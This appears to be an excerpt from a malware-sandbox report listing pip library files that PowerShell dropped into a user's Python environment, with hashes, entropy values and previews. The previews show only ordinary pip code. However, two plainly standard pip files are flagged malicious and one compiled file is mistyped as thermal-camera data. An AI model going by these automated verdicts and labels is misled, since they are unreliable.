                                                                                                                                                                                                                              Entropy (8bit):4.7236356430277295
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1l2tody7NW1qKFSXZubhVKNn4wabYpLgtBvLudhf:1lNys1qKwXcb/KNn4Jb8WBadhf
                                                                                                                                                                                                                              MD5:E5F2A6A261468DCA3CAC29CB0B8C0757
                                                                                                                                                                                                                              SHA1:0201AE093A062375F394FB95DB6A50FF781E57A6
                                                                                                                                                                                                                              SHA-256:6DEA55279A23A4292FE8DD45D07FEBAD537464EDC9BB3D96D7E554F7CB3D552C
                                                                                                                                                                                                                              SHA-512:7368CC3D427BE2479B48A737496FD58ED15BB7F74C83349F2B0942DDF46C0DFB7B4AE30823D5EC3A06131C209D71DF41B122CB2D330A22812F5AEFD71F877010
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfV.........................~.....d.d.l.Z.d.d.l.Z.e.j...................d.....d...e.j...........................f.v.r.e.j...................j...................d...........e.d.k(..rPe.j...................j...................e.j...................j...................e.................Z.e.j...................j...................d.e...........e.d.k(..r.d.d.l.m.Z.....e.j.....................e...................y.y.)......N....__main__)...main)...os..sys..path..getcwd..pop..__package__..dirname..__file__..insert..__name__..pip._internal.cli.mainr......_main..exit........=C:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/__main__.py..<module>r........s.....................8.8.A.;.2.y.r.y.y.{..#..#....H.H.L.L...O......".........7.7.?.?.2.7.7.?.?.8..4..5.D....H.H.O.O.A.t.......z.....4....C.H.H.U.W........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2186
                                                                                                                                                                                                                              Entropy (8bit):5.441134918100277
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:x9Azo+7UmyMBzdoQLjWpNgF4uwzfm/819e4fTzb38hv5F:QEgUmyMBz0pNgFBwzf919e4f345P
                                                                                                                                                                                                                              MD5:3F88DE8C8CDE894B572AA3825D7EEEE7
                                                                                                                                                                                                                              SHA1:AE2793CF5FB76D7563EE87669E5463DC2AD1DCFD
                                                                                                                                                                                                                              SHA-256:593E21FE7A09BEE0B339012494703FF5FE486960586A5B96737E49D27FFB4B88
                                                                                                                                                                                                                              SHA-512:AE9A6598C71D0DCB90DA5FA24D7C35A6D98D0E111744F79CB6AFAD70DEEA4BEAB5F636CC0406DB645A9AC3375DA92AD14D2E63060F41D83CD5613A86C415CD0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................t.....d.Z.d.d.l.Z.d.Z.d...Z.e.j...................d.d...e.k...r1..e.d.j.....................e.e.j...................d.d.............e.e...........................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....e...e.e.................Z...G.d...d.........Z.e.j...................j!..................d...e...................e.d.k(..s.J.d.............e.j$..................d.d.d.............y.).z.Execute exactly this copy of pip, within a different environment...This file is named as it is, to ensure that this module can't be imported via.an import statement.......N)...........c.....................2.....d.j...................d...|.D.................S.).N...c................3....2...K.....|.]...}.t.........|...................y...w.).N)...str)....0..vs.... .CC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/__pip-runner__.py..<genexpr>z.version_str.<locals>.<genexpr>....s...........,.q.C...F..,.s........)...join)...versions.... r......version_strr........s..........8
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):515
                                                                                                                                                                                                                              Entropy (8bit):4.661149717217781
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB9nmWODIK0p/+8J0xEwKhZX5XrlIRro+dCle2+LcJWGORMl:1RE2NK8B0+X5GRroeC6LcJWBRa
                                                                                                                                                                                                                              MD5:9A55C5453089DEC5D22808E8691DDF00
                                                                                                                                                                                                                              SHA1:04E3B87F1B0CC47D44BFC69F71CBD395579FC00E
                                                                                                                                                                                                                              SHA-256:8AA679F9842C415D3CB6451CECBF34E917A8A7AB60B8B1567FBD32485E9B7B46
                                                                                                                                                                                                                              SHA-512:883FDB06C292069A03E5D1E4DEFA15D5C6961B8DC9FCE35730EF098947385B15B111C668D76B8011EFF76CC86AD72933C687F37953F958582847720F5D5C6719
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import List, Optional..from pip._internal.utils import _log..# init_logging() must be called before any call to logging.getLogger().# which happens at import of most modules.._log.init_logging()...def main(args: (Optional[List[str]]) = None) -> int:. """This is preserved for old console scripts that may still be referencing. it... For additional details, see https://github.com/pypa/pip/issues/7498.. """. from pip._internal.utils.entrypoints import _wrapper.. return _wrapper(args).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):769
                                                                                                                                                                                                                              Entropy (8bit):5.263678820230435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:0/8nRroeC6LcJ2UkkIKNnmNLlJmOKH7LS8i:VnRroeC6u2kmNL7q7ri
                                                                                                                                                                                                                              MD5:8515A85833C7E12FF2EB989C698905AE
                                                                                                                                                                                                                              SHA1:EC377915FD8355F04E72F8B29EF223A06F0FC3CB
                                                                                                                                                                                                                              SHA-256:F6A7A1870743B9253B89767CA33BED9F8B222DEB3F89F3FCD9CD22C18E757944
                                                                                                                                                                                                                              SHA-512:D99A81983132AF7628DE27D17E0B11C762D7F353B8101B8221DBE8ACD80FA5F4757A4C662CD9EE1AFA25100410F14BD5EB3BE81EB6CB91062BEB69F75A88C384
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................`.....d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j.............................d.d.e.e.e.........d.e.f.d...Z.y.)......)...List..Optional)..._logN..args..returnc...........................d.d.l.m.}.....|.|.........S.).z.This is preserved for old console scripts that may still be referencing. it... For additional details, see https://github.com/pypa/pip/issues/7498.. r....)..._wrapper)...pip._internal.utils.entrypointsr....).r....r....s.... .GC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/__init__.py..mainr........s..........9....D.>........).N)...typingr....r......pip._internal.utilsr......init_logging..str..intr......r....r......<module>r........s7..........!..$..........................c....#............r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14276
                                                                                                                                                                                                                              Entropy (8bit):5.3118347047268335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:SYQLFtSDKJ9oSrfgDPyTkkodx+TRadHVwxr2UB6bEzs1:STbSDKX4DPZk4x+TRah2xrrobEzs1
                                                                                                                                                                                                                              MD5:88A1C713C4C66979239B1A5B9C00330D
                                                                                                                                                                                                                              SHA1:4BA037BC592D1283505EE87B51AFD5B338E06334
                                                                                                                                                                                                                              SHA-256:DDEC34F9071514769806066BDF284E5019C71524E692A08FDE666F0274166A01
                                                                                                                                                                                                                              SHA-512:F1B6FAB52535B99014A2D2E7915FD6AA6CB2246967343EC6F48C7F38036810794F2033D3BB8DA0E4175F0CA6DADCC9258303505ED924EADDE733A1E9937BDA98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.(.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z m!Z!m"Z"..d.d.l#m$Z$m%Z%..d.d.l&m'Z'..d.d.l(m)Z)m*Z*..e.r.d.d.l+m,Z,....e.jZ..................e.........Z/d.e0d.e0d.e.e.e0....e.e0e0f.....f.....f.d...Z1..G.d...d.........Z2d.e0f.d...Z3d.e.e0....f.d...Z4..G.d...d.........Z5..G.d...d.e5........Z6y.).z;Build Environment used for isolation during sdist building......N)...OrderedDict)...TracebackType)...TYPE_CHECKING..Iterable..List..Optional..Set..Tuple..Type..Union)...where)...Requirement)...Version)...__file__)...open_spinner)...get_platlib..get_purelib..get_scheme)...get_default_environment..get_environment)...call_subprocess)...TempDirectory..tempdir_kinds)...PackageFinder..a..b..returnc...........................|.|.k7..r.|.|.f.S.|.f.S...N..).r....r....s.... .HC:\Users\xbov\Desktop\pyops\Lib\site-packages\pi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12647
                                                                                                                                                                                                                              Entropy (8bit):5.349312293459522
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:XypYBegOXTZGVNw2NMf2pw/za9xVymU4s6FdMl:4iePXFGvw2NMf2pUO8msIdMl
                                                                                                                                                                                                                              MD5:C49398FDC03C42A2414E31E015C70055
                                                                                                                                                                                                                              SHA1:5EA3AABF07192AD04D6A63B0C3F65481F362A027
                                                                                                                                                                                                                              SHA-256:F803A0770DB2C1F5B570178FC76EE78963CAEC124FB88496A8D38C776B444EE6
                                                                                                                                                                                                                              SHA-512:A1B2CB357F99C71E5B8439A124C5BA66CE1C10ACBF1D22746E4168591153BBDDDCA813F991E0E856A9F4EC3F82F99840D8AF12FAAE3FA224253605C985188860
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.(........................d.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j>..................e ........Z!d.Z"d.e.e#e#f.....d.e#f.d...Z$..G.d...d.........Z%..G.d...d.e%........Z&..G.d...d.e&........Z'..G.d...d.........Z(..G.d...d.e%........Z)y.).z.Cache Management......N)...Path)...Any..Dict..List..Optional)...Tag..interpreter_name..interpreter_version)...canonicalize_name)...InvalidWheelFilename)...DirectUrl)...Link)...Wheel)...TempDirectory..tempdir_kinds)...path_to_urlz.origin.json..d..returnc..........................t.........j...................|.d.d.d...........}.t.........j...................|.j...................d.................j...........................S.).z'Return a stable sha224 of a dictionary.T)...,..:)...sort_keys..separators..ensure_ascii..ascii)...json..dumps..hashlib..sha224..encode..hexdigest).r......ss.... .D
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 6400-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, minimum point enabled, calibration: offset 0.000000, slope 556131155968.000000
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17648
                                                                                                                                                                                                                              Entropy (8bit):5.3408462030190575
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:AHI/5gWVabg315MhZkcQJDgCtfSJFZ02Ieg0J:Ao/Sg3jMhZbeDgCWFZ02IZq
                                                                                                                                                                                                                              MD5:EDA4304F664916B4308C209F617B9848
                                                                                                                                                                                                                              SHA1:81490A8B53D37417C013BECFBCDB83C1A4D5E77B
                                                                                                                                                                                                                              SHA-256:E5C02DB37663E2DC195F620CAFCB4AE13A8642E735FF15E435CD981410B1E1D8
                                                                                                                                                                                                                              SHA-512:DC696654C7C8036E90FC6B819FF6C60B151E951B95E4A1B000C1DC5A0714560AAA47ADA314BF58340FA8AADC726DEE4BC10D9199663A21F076F991590BAE2C81
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.6..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j2..................Z...e.d.e.........Z.e.r.d.n.d.Z.d.Z...e.d.d.d.d.d...........Z.e.j>..................e.j@..................e.jB..................e.jD..................e.jF..................f.Z$e.j@..................e.j>..................e.jB..................f.Z%..e.e&........Z'd.e.d.e.f.d...Z(d.e.d.e.e.....f.d...Z)d.e.e.e.e.....f.....f.d...Z*..G.d...d.........Z+y.).a....Configuration management setup..Some terminology:.- name. As written in config files..- value. Value associated with a name.- key. Name combined with it's section (section.name).- variant. A single word describing where the configuration key-value pair came from......N)...Any..Dict..Iterable..List..NewType..Optional..Tuple)...ConfigurationError.!ConfigurationFileCouldNotBeLoaded)...appdirs)...WINDOWS)...getLogger)...ensure_dir..e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33266
                                                                                                                                                                                                                              Entropy (8bit):5.434752751605097
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:cm5souOrLXixCXJUnGnexJrJ163Ykkc+qZs3d:c6/is56Gq163YIE
                                                                                                                                                                                                                              MD5:D7CCE4CC5BDB9F61B840CD5634D19479
                                                                                                                                                                                                                              SHA1:23D711BF8BEFD648C84A9A3A8DC4D175D65626B5
                                                                                                                                                                                                                              SHA-256:BEE97E6A19E2B51112FAF77BEDF7725DD6449B1479F798B32DC4FFDFDA68C763
                                                                                                                                                                                                                              SHA-512:1FDCB9D8180DF5C2ACF5A02906167ED1095379FA207E59C00E88550C7B73802D44CD7D261998D14000B6E4151E8C04D400EFA9FC19987C297C2E8EC7F0DBF8BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfR\........................8.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$....e.jJ..................e&........Z'd.e(d.e)f.d...Z*d.e.e.e(f.....d.e.d.e(d.e(d.e.f.d...Z+..G.d...d.e,........Z-..G.d...d.e-........Z...G.d...d.e-........Z/..G.d...d.e-........Z0..G.d...d.e-........Z1..G.d...d.e.........Z2..G.d ..d!e.........Z3..G.d"..d#e-........Z4..G.d$..d%e0........Z5..G.d&..d'e0........Z6..G.d(..d)e0........Z7..G.d*..d+e0........Z8..G.d,..d-e-........Z9..G.d...d/e-........Z:..G.d0..d1e-........Z;..G.d2..d3e-........Z<..G.d4..d5e-........Z=..G.d6..d7e0........Z>..G.d8..d9e0........Z?..G.d:..d;e0........Z@..G.d<..d=e0........ZA..G.d>..d?e.e0........ZB..G.d@..dAeBe0........ZC..G.dB..dCe0........ZD..G.dD..dEe0........ZE..G.dF..dGeE........ZF..G.dH..dIeE........ZG..G.dJ..dKeE........ZH..G.dL..dMeE........ZI
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                                              Entropy (8bit):5.287441617120758
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TWBEn5u/83nG+Rro+dCle2+LcJ22RkC3KNnbg/N/5cW2lJZoMQtbUb3ct:TW1/8nRroeC6LcJ2UkIKNncNCzlJZoBt
                                                                                                                                                                                                                              MD5:438E0BF3389EF887E2677AB3E54203EF
                                                                                                                                                                                                                              SHA1:7F516FA1C95E6DF34B4D1B34237EE6F912D82432
                                                                                                                                                                                                                              SHA-256:093FEF876F707D400C108F0AAD7E7C289303DDDDB04D22B3785D913D8FFCDB48
                                                                                                                                                                                                                              SHA-512:80E17C12B8BE938EE7E0651716D601A4D1093543B3FDAAE7720D835391F23FB7FCFF1167527DFC52B5478FBE0D09CCA68A1D2DEFD39C9D111CF8854504E334E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfT.........................2.....d.d.l.m.Z.m.Z...d.d.e.e.e.........d.e.f.d...Z.y.)......)...List..OptionalN..args..returnc...........................d.d.l.m.}.....|.|.........S.).z.This is preserved for old console scripts that may still be referencing. it... For additional details, see https://github.com/pypa/pip/issues/7498.. r....)..._wrapper)...pip._internal.utils.entrypointsr....).r....r....s.... .CC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/main.py..mainr........s..........9....D.>........).N)...typingr....r......str..intr......r....r......<module>r........s$..........!......x...S...."......c.....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4953
                                                                                                                                                                                                                              Entropy (8bit):5.66312199063998
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pHC80Bq1RKW6EdlzBhDc89eeuB3bvVpor36+6kMjd6wuw2P4JVIkxp:oRWRjnLzBhY890c3gDPuw2Vup
                                                                                                                                                                                                                              MD5:3DF9AC014051038B16E91F08FD117AF0
                                                                                                                                                                                                                              SHA1:3A541D308369CC4D1E7CB3A2F368D18B26470C60
                                                                                                                                                                                                                              SHA-256:21925B5C76E5992501F6E19E01E566BCC6FB148EBE0B8F6501BF834F15C6EFAB
                                                                                                                                                                                                                              SHA-512:0A04201937E4837C69DED6E81F29910ADB01CA739F3376398D441C429B66155102AA82733A27287186D05FFE2E6F7DC3706F2E69A0CCA6C3C161E5423CC60C56
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.e.d.e.f.d...Z.d.e.d.e.f.d...Z...e.d.g.d...........Z.d.e.e.....d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...namedtuple)...Any..List..Optional)...tomli)...InvalidRequirement..Requirement)...InstallationError..InvalidPyProjectBuildRequires..MissingPyProjectBuildRequires..obj..returnc.....................J.....t.........|.t.................x.r...t.........d...|.D.................S.).Nc................3....<...K.....|.]...}.t.........|.t...........................y...w.).N)...isinstance..str)....0..items.... .HC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/pyproject.py..<genexpr>z"_is_list_of_str.<locals>.<genexpr>....s..........(O.4...D.#.)>.(O.s........).r......list..all).r....s.... r......_is_list_of_strr........s..........c.4.. ..O.S.(O.3.(O.%O..O.......unpacked_source_directoryc.....................B.....t.........j..................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10534
                                                                                                                                                                                                                              Entropy (8bit):5.321623712927778
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9lFL72vlTVgeu0/r1yj99GZos98vtPdmd2RBuz0AAtmy:Zspge3zY+ZNwtPdmd2RBw0AAt7
                                                                                                                                                                                                                              MD5:750C2447265A9A0D622EB2F866A8D484
                                                                                                                                                                                                                              SHA1:09B57F1D9A76E978D2566D0868D823ED8B4A36B1
                                                                                                                                                                                                                              SHA-256:7603126D6584A91AF225F39655E39ECAC8FD7EBC088DD79A61EF745E940D9938
                                                                                                                                                                                                                              SHA-512:780637435581A2D2859C329630438F71D707FB7653FE384534489A5B7B777D364DAA3F27C82A47C130968F01803844885B2D1237710148CE8791FD79237BA142
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf. ........................x.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+m,Z,m-Z-..d.d.l.m/Z/....e.j`..................d...........Z1..e.jd..................e3........Z4d.e5d.e5f.d...Z6d.e5d.e.j...................f.d...Z7..G.d...d.........Z8e...G.d...d.................Z9d.e5d.e:f.d...Z;d.e$d e.jx..................d.e.e5....f.d!..Z=d"e8d#e.j...................d$e d%e.g.e.e5....f.....d.e.e9....f.d&..Z>d.e$d e.jx..................d.d.f.d'..Z?y.)(.....N)...dataclass)...Any..Callable..Dict..Optional)...parse)...Group)...escape)...Text)...LinkCollector)...PackageFinder)...get_default_environment)...DistributionVersion)...SelectionPreferences)...PipSession)...WINDOWS).. get_best_invocation_for_this_pip.#get_best_invocation_for_this_python)...adjacent_tmp_file..check_p
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13631
                                                                                                                                                                                                                              Entropy (8bit):5.433787074889185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:4zEERxH216Bbajw2h2/s9zzCf2AKMmQ13FVPaZlqpi4jnVO48qu6u:QHawv/sK2hqVPaZl4jK
                                                                                                                                                                                                                              MD5:FE0F2E9170DB2CBF649D2E7D8632DAB0
                                                                                                                                                                                                                              SHA1:C6191FBB366F724A893727021E3C15379CE0CC28
                                                                                                                                                                                                                              SHA-256:4A1E944EA0951B96CA2BE7C817E31603B4AF0130D1268D33D0AC78511600A74B
                                                                                                                                                                                                                              SHA-512:2E19DD9BC38DC4AC9065619B3E82E8D0F6B42724F42080C4D33E50F1E1E8DC93BEED37CF72B107776D6A4C6548D59F95FADB372A1C8E184815DE29E3C9E82A3E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3....e.jh..................e5........Z6..e.jn..................d.e.jp..........................Z9e.e.e$....e.e$....f.....Z:d.e;d.e<f.d...Z=d.e$d.e<d.e<f.d...Z>d.e$d.e<f.d...Z?d.e$d.e<f.d...Z@d.e$d.e.e<....f.d...ZAd.e$d e.d.e;f.d!..ZBd.e$d"e;d.d.f.d#..ZCd.e$d$e;d%e<d&e.e;....d'e.e;....d(e<d.e.e;....f.d)..ZDd.e$d$e;d&e.e;....d'e.e;....d(e<d.e.e;....f.d*..ZEd.e$d'e.e;....d.e<f.d+..ZFd,e.e$....d e.d%e<d&e.e;....d'e.e;....d.e:f.d-..ZGy.).z;Orchestrator for building wheels from InstallRequirements.......N)...Iterable..List..Optional..Tuple)...canonicalize_name..canonicalize_version)...InvalidVersion..Version)...WheelCache)...InvalidWheelFilename..UnsupportedWhe
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10243
                                                                                                                                                                                                                              Entropy (8bit):4.395370465181364
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:SE3AUkzvbllGh+3fXXQBYSChox+AlQGr6r7LWuwSPzfgLooJvIXe6RtAzZ16CPxL:SkAUSlIqXQNlXM7LWZSrfgLoDsxsSaeZ
                                                                                                                                                                                                                              MD5:CC659AE8BE436AA38EA291B1B5D08E6F
                                                                                                                                                                                                                              SHA1:7EF2977A8D3212E58BA66AC088293FD659D61B42
                                                                                                                                                                                                                              SHA-256:D444A9AB0D22BA94BF2BBA6164AE73B21544E42CF2F41B462C55385BA127BDAF
                                                                                                                                                                                                                              SHA-512:11AEA4A82DDDB5B0D47C8AF82FA0BF4C62242B0D1D3D74257FEAB3E10390463C399B3F694F5941A3DC900C2D245698B88826FA1DE5B3BDB8335DA7F9C24E1C63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Build Environment used for isolation during sdist building."""..import logging.import os.import pathlib.import site.import sys.import textwrap.from collections import OrderedDict.from types import TracebackType.from typing import TYPE_CHECKING, Iterable, List, Optional, Set, Tuple, Type, Union..from pip._vendor.certifi import where.from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.version import Version..from pip import __file__ as pip_location.from pip._internal.cli.spinners import open_spinner.from pip._internal.locations import get_platlib, get_purelib, get_scheme.from pip._internal.metadata import get_default_environment, get_environment.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.temp_dir import TempDirectory, tempdir_kinds..if TYPE_CHECKING:. from pip._internal.index.package_finder import PackageFinder..logger = logging.getLogger(__name__)...def _dedup(a: str, b: str) -> Union[Tuple[str], Tuple[str,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10370
                                                                                                                                                                                                                              Entropy (8bit):4.3960208157716405
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:pEAAfyDFY1ws+8scr2e3pNrhzLWAiykT8T+E3RR:p3AfyDFY1wsLsve/VN/
                                                                                                                                                                                                                              MD5:E47259B785668AF0E2A0177D083216A4
                                                                                                                                                                                                                              SHA1:5FAF201D6C043D128E895832CBFBDFC8B23C6CC9
                                                                                                                                                                                                                              SHA-256:BA2603FBD17406FD42F19C9613CE65A730E641FEE17149202FDF46988F08E354
                                                                                                                                                                                                                              SHA-512:0268E08FE927E4F74C3A6839134608962C6A128EEE279716832A015A6248167890923BB909C174CCDFB9DB78048AB053B9683C6EB07D049D77E4626339C44584
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Cache Management."""..import hashlib.import json.import logging.import os.from pathlib import Path.from typing import Any, Dict, List, Optional..from pip._vendor.packaging.tags import Tag, interpreter_name, interpreter_version.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import InvalidWheelFilename.from pip._internal.models.direct_url import DirectUrl.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.utils.temp_dir import TempDirectory, tempdir_kinds.from pip._internal.utils.urls import path_to_url..logger = logging.getLogger(__name__)..ORIGIN_JSON_NAME = "origin.json"...def _hash_dict(d: Dict[str, str]) -> str:. """Return a stable sha224 of a dictionary.""". s = json.dumps(d, sort_keys=True, separators=(",", ":"), ensure_ascii=True). return hashlib.sha224(s.encode("ascii")).hexdigest()...class Cache:. """An abstract class - provides cache directories for data from links.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):132
                                                                                                                                                                                                                              Entropy (8bit):4.33775413372005
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:FEGWgGtM4LCFgJv8tLzC8MlXl2FD2H3OVQ7RVc7yQbQxPo:FvWgG+vg18tLgN4/Venc7yQ8xg
                                                                                                                                                                                                                              MD5:F0AC37F23494412689AEE309275C45FB
                                                                                                                                                                                                                              SHA1:C98BBA03EBC076049B09E2A3168633079A3EA7B1
                                                                                                                                                                                                                              SHA-256:1641C1829C716FEFE077AAF51639CD85F30ECC0518C97A17289E9A6E28DF7055
                                                                                                                                                                                                                              SHA-512:4B65E60D8D9D0E63D44B2F49BE01A062CE68FDAE5C962D5AF009E3358EDD5C18BDE6D754846CC005C67811C9310DDC7EADD818002AED79CA3EA452384A176973
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Subpackage containing all of pip's command line interface related code."""..# This file intentionally does not import submodules.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
